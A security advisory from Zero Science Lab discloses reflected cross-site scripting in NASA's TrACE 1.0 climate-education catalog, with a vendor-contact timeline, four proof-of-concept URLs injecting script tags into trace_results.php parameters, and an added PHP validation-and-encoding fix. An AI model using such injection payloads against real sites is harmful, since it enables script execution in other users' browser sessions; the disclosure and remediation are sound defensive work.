NASA Tri-Agency Climate Education (TrACE) 1.0 XSS

Posted Oct 26, 2012
Authored by LiquidWorm | Site zeroscience.mk

The Tri-Agency Climate Education (TrACE) Catalog provides search and browse access to a catalog of educational products and resources. TrACE focuses on climate education resources that have been developed by initiatives funded through NASA, NOAA, and NSF, comprising a tri-agency collaboration around climate education. The application suffers from a reflected cross-site scripting vulnerability: input passed to the 'product_id', 'pi', 'project_id' and 'funder' GET parameters of the 'trace_results.php' script is not properly sanitized before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in the context of an affected site. Version 1.0 is affected.

tags | exploit, arbitrary, php, xss
SHA-256 | a8958302bb602beff4ebb5517ad18454b487ae666d4353e85526aec09144e0a6


NASA Tri-Agency Climate Education (TrACE) v1.0 Multiple XSS Vulnerabilities


Vendor: NASA
Product web page: http://www.nasa.gov
Affected version: 1.0

Summary: The Tri-Agency Climate Education (TrACE) Catalog provides search and
browse access to a catalog of educational products and resources. TrACE focuses
on climate education resources that have been developed by initiatives funded
through NASA, NOAA, and NSF, comprising a tri-agency collaboration around
climate education.

Desc: The application suffers from a reflected cross-site scripting vulnerability:
input passed to the 'product_id', 'pi', 'project_id' and 'funder' GET parameters
of the 'trace_results.php' script is not properly sanitised before being returned
to the user. This can be exploited to execute arbitrary HTML and script code in a
user's browser session in the context of an affected site.

Tested on: Apache/2.2.21
PHP 5.2.17


Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Zero Science Lab - http://www.zeroscience.mk


Vendor status:

[03.10.2012] Vulnerabilities discovered.
[03.10.2012] Initial contact with the vendor.
[04.10.2012] No reply from vendor.
[05.10.2012] Tried contacting the vendor again.
[12.10.2012] No reply from vendor.
[13.10.2012] Last try contacting the vendor.
[15.10.2012] Vendor replies stating that the problem is solved?!
[16.10.2012] Replied to vendor that no problems are solved because no details were sent nor problems explained.
[17.10.2012] Vendor decides to talk seriously and asks for details, cynically.
[18.10.2012] Sent detailed information and PoC files to the vendor.
[22.10.2012] Asked vendor for status report.
[22.10.2012] No reply from vendor.
[23.10.2012] Vendor silently patches the application (v2.0).
[23.10.2012] Asked vendor to have proper communication.
[25.10.2012] No reply from vendor.
[25.10.2012] Pointed out the disclosure policy and ethical communication to the vendor.
[26.10.2012] Public security advisory released.


Advisory ID: ZSL-2012-5111
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5111.php



03.10.2012



PoC:
----


- https://www.example.com/trace/trace_results.php?product_id=117"><script>alert(1);</script>&project_id=40&funder=31&pi=43
- https://www.example.com/trace/trace_results.php?product_id=117&project_id=40"><script>alert(2);</script>&funder=31&pi=43
- https://www.example.com/trace/trace_results.php?product_id=117&project_id=40&funder=31"><script>alert(3);</script>&pi=43
- https://www.example.com/trace/trace_results.php?product_id=117&project_id=40&funder=31&pi=43"><script>alert(4);</script>
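
Remediation sketch for the flaw described above, added here as an example; it is not code from the advisory or from the TrACE application, whose source is not shown on this page. It assumes the four parameters are numeric record IDs (as in the PoC URLs) that get echoed into quoted HTML attributes; the helper names `read_id_param`, `h` and `render_filters` are hypothetical.

```php
<?php
// Added example; the real trace_results.php source is not on this page.
// A hypothetical vulnerable pattern that matches the PoC's `">` breakout:
//   echo '<input name="pi" value="' . $_GET['pi'] . '">';

// The four GET parameters the advisory names; the PoC URLs carry numeric IDs.
$idParams = array('product_id', 'pi', 'project_id', 'funder');

// Return the parameter as a positive integer, or null if absent or invalid.
function read_id_param(array $query, $name)
{
    if (!isset($query[$name]) || !is_string($query[$name])) {
        return null; // absent, or an array such as ?pi[]=1
    }
    $value = filter_var($query[$name], FILTER_VALIDATE_INT,
        array('options' => array('min_range' => 1)));
    return $value === false ? null : $value;
}

// Encode for HTML text and quoted-attribute contexts.
function h($text)
{
    return htmlspecialchars((string) $text, ENT_QUOTES, 'UTF-8');
}

// Build the hidden filter fields; refuse the request on any invalid ID.
function render_filters(array $query, array $names)
{
    $html = '';
    foreach ($names as $name) {
        if (!isset($query[$name])) {
            continue; // optional filter not supplied
        }
        $id = read_id_param($query, $name);
        if ($id === null) {
            return '<p>Invalid value for ' . h($name) . '.</p>' . "\n";
        }
        $html .= '<input type="hidden" name="' . h($name)
               . '" value="' . h($id) . '">' . "\n";
    }
    return $html;
}

// Constructed sample input modelled on the first PoC URL above.
$sample = array('product_id' => '117"><script>alert(1);</script>',
                'project_id' => '40', 'funder' => '31', 'pi' => '43');
echo render_filters($sample, $idParams); // rejected: product_id is not an integer
$sample['product_id'] = '117';
echo render_filters($sample, $idParams); // all four IDs validated and encoded
```

Validation and output encoding are applied together: the integer check rejects the markup outright, and `ENT_QUOTES` encoding keeps any value that does reach the page from closing the attribute.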